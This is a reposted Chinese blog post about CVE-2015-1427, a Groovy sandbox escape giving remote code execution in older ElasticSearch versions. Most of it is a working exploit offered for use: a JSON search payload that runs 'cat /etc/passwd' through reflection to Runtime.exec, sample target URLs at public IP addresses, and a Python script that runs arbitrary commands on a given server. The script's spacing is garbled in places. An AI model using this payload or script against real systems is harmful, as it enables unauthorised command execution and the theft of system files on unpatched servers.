ElasticSearch Groovy脚本远程代码执行漏洞

中国黑客俱乐部:

Hack L0s4r's Blog - 黑客博客,黑客笔记.:

ElasticSearch的这个漏洞的编号是CVE-2015-1427,影响版本为1.3.0-1.3.7以及1.4.0-1.4.2,漏洞成因详见:http://drops.wooyun.org/papers/5107,本文具体探讨一下漏洞利用。
1.2.0版本默认是禁用了脚本执行,如果要使用该功能的话,要在elasticsearch.yml中设置script.disable_dynamic:true。
在1.3.0版本,开始使用groovy和sandbox来进行脚本执行,其中使用了白名单机制,限制了可以调用的类和方法等等。
但是因为Java中的反射机制,我们可以通过白名单中的类获取到Runtime,也就造成了远程代码执行漏洞,威力很大。
直接给出EXP
测试url:http://190.196.67.252:9200/_search?pretty

  


  
  1.    

  2. http://191.234.18.14:9200///_search?pretty

   
  • {"size":1,"script_fields":{"iswin":{"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang":"groovy"}}}

   
  1.  

  


  


  
  1.    

  2. #!/usr/bin/env python

   
  • importurllib

   
  • importurllib2

   
  • importjson

   
  • importsys

   
   
  • defexecute(url,command):

   
  •     parameters={"size":1,

   
  •                     "script_fields":

   
  •                     {"iswin":

   
  •                         {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).\

   
  •                         newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.\

   
  •                         class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"%s\").\

   
  •                         getInputStream())).readLines()"%command,"lang":"groovy"}

   
  •                     }

   
  •                 }

   
  •     data=json.dumps(parameters)

   
  •     try:

   
  •         request=urllib2.Request(url+"_search?pretty",data)

   
  •         request.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36')

   
  •         response=urllib2.urlopen(request)

   
  •         result=json.loads(response.read())["hits"]["hits"][0]["fields"]["iswin"][0]

   
  •         foriinresult:

   
  •             printi

   
  •     exceptException,e:

   
  •         printe

   

   

  • if__name__=='__main__':

   
  •     iflen(sys.argv)!=3:

   
  • print"usage %s url command"%sys.argv[0]

   
  •     else:

   
  •         execute(sys.argv[1],sys.argv[2])





   
  1.  

评论
热度(2)
  1. 千秋雪逍遥博客 转载了此文字
 

© 千秋雪 | Powered by LOFTER